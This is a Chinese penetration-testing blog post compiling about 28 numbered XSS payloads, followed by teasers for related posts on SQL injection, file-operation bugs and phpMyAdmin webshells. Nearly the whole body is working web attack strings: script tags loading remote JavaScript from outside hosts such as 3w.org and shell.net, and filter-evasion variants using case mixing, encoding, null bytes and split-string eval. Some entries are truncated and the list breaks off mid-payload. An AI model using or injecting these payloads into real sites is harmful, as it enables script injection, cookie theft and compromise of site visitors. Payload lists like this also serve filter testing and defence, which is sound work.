XSS攻击代码汇总

情话
情话
情话
42
文章
2
评论
2018年11月23日22:10:17XSS攻击代码汇总已关闭评论 4.7K 1943字阅读6分28秒

(1)普通的XSS JavaScript注入 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>(2)IMG标签XSS使用JavaScript命令 <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT> (3)IMG标签无分号无引号 <IMG SRC=javascript:alert(‘XSS’)> (4)IMG标签大小写不敏感 <IMG SRC=JaVaScRiPt:alert(‘XSS’)> (5)HTML编码(必须有分号) <IMG SRC=javascript:alert(“XSS”)> (6)修正缺陷IMG标签 <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”> (7)formCharCode标签(计算器) <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> (8)UTF-8的Unicode编码(计算器) <IMG SRC=jav..省略..S')> (9)7位的UTF-8的Unicode编码是没有分号的(计算器) <IMG SRC=jav..省略..S')> (10)十六进制编码也是没有分号(计算器) <IMG SRC=java..省略..XSS')>(11)嵌入式标签,将Javascript分开 <IMG SRC=”jav ascript:alert(‘XSS’);”> (12)嵌入式编码标签,将Javascript分开 <IMG SRC=”jav ascript:alert(‘XSS’);”> (13)嵌入式换行符 <IMG SRC=”jav ascript:alert(‘XSS’);”> (14)嵌入式回车 <IMG SRC=”jav ascript:alert(‘XSS’);”> (15)嵌入式多行注入JavaScript,这是XSS极端的例子 <IMG SRC=”javascript:alert(‘XSS‘)”> (16)解决限制字符(要求同页面) <script>z=’document.’</script> <script>z=z+’write(“‘</script> <script>z=z+’<script’</script> <script>z=z+’ src=ht’</script> <script>z=z+’tp://ww’</script> <script>z=z+’w.shell’</script> <script>z=z+’.net/1.’</script> <script>z=z+’js></sc’</script> <script>z=z+’ript>”)’</script> <script>eval_r(z)</script> (17)空字符12-7-1 T00LS - Powered by Discuz! Board https://www.t00ls.net/viewthread.php?action=printable&tid=15267 2/6 perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用 perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out (19)Spaces和meta前的IMG标签 <IMG SRC=” javascript:alert(‘XSS’);”> (20)Non-alpha-non-digit XSS <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT> (21)Non-alpha-non-digit XSS to 2 <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)> (22)Non-alpha-non-digit XSS to 3 <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT> (23)双开括号 <<SCRIPT>alert(“XSS”);//<</SCRIPT> (24)无结束脚本标记(仅火狐等浏览器) <SCRIPT SRC=http://3w.org/XSS/xss.js?<B> (25)无结束脚本标记2 <SCRIPT SRC=//3w.org/XSS/xss.js> (26)半开的HTML/JavaScript XSS <IMG SRC=”javascript:alert(‘XSS’)” (27)双开角括号 <iframe src=http://3w.org/XSS.html < (28)无单引号 双引号 分号 <SCRIPT>a=/XSS/

情话
  • 本文由 发表于 2018年11月23日22:10:17
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
渗透经验分享之文件操作漏洞拓展 渗透笔记

渗透经验分享之文件操作漏洞拓展

上文分享了注入相关的东西,注入也可以对文件进行操作,本文是对文件操作漏洞的拓展。 文件操作漏洞 文件上传 文件读取 文件写入 文件删除 文件包含 一般java的站点存在文件系列的洞比较多(除了文件包含...
渗透经验分享之SQL注入思路拓展 渗透笔记

渗透经验分享之SQL注入思路拓展

写在文前 从实习到现在,因为从事打点工作的原因,实战经验积累了很多,就想写一些自己在实战中碰到的问题,以及自己的解决方法,因为保密的原因大多数不提供复现环境和截图,权当对渗透思路的一个拓展吧。可能会多...
对某ddos页端更深层次漏洞分析篇+漏洞利用篇 技术园

对某ddos页端更深层次漏洞分析篇+漏洞利用篇

我只负责说一下,怎么修你们自己研究吧! 来自某位不知名的群友说的,具体自测反正我知道有sql注入漏洞,其他未经证实不好说! 我转发一下再说一下我自己观点! 正文 群友原文 首先如图,我们看到这位群友输...
渗透培训-漏洞利用《phpmyadmin后台getshell》 渗透笔记

渗透培训-漏洞利用《phpmyadmin后台getshell》

导出WebShell主要条件: Root数据库用户(root权限) 网站绝对路径(确定有写入权限) magic_quotes_gpc:Off(关闭) 导出WebShell其它条件: magic_quo...
广告也精彩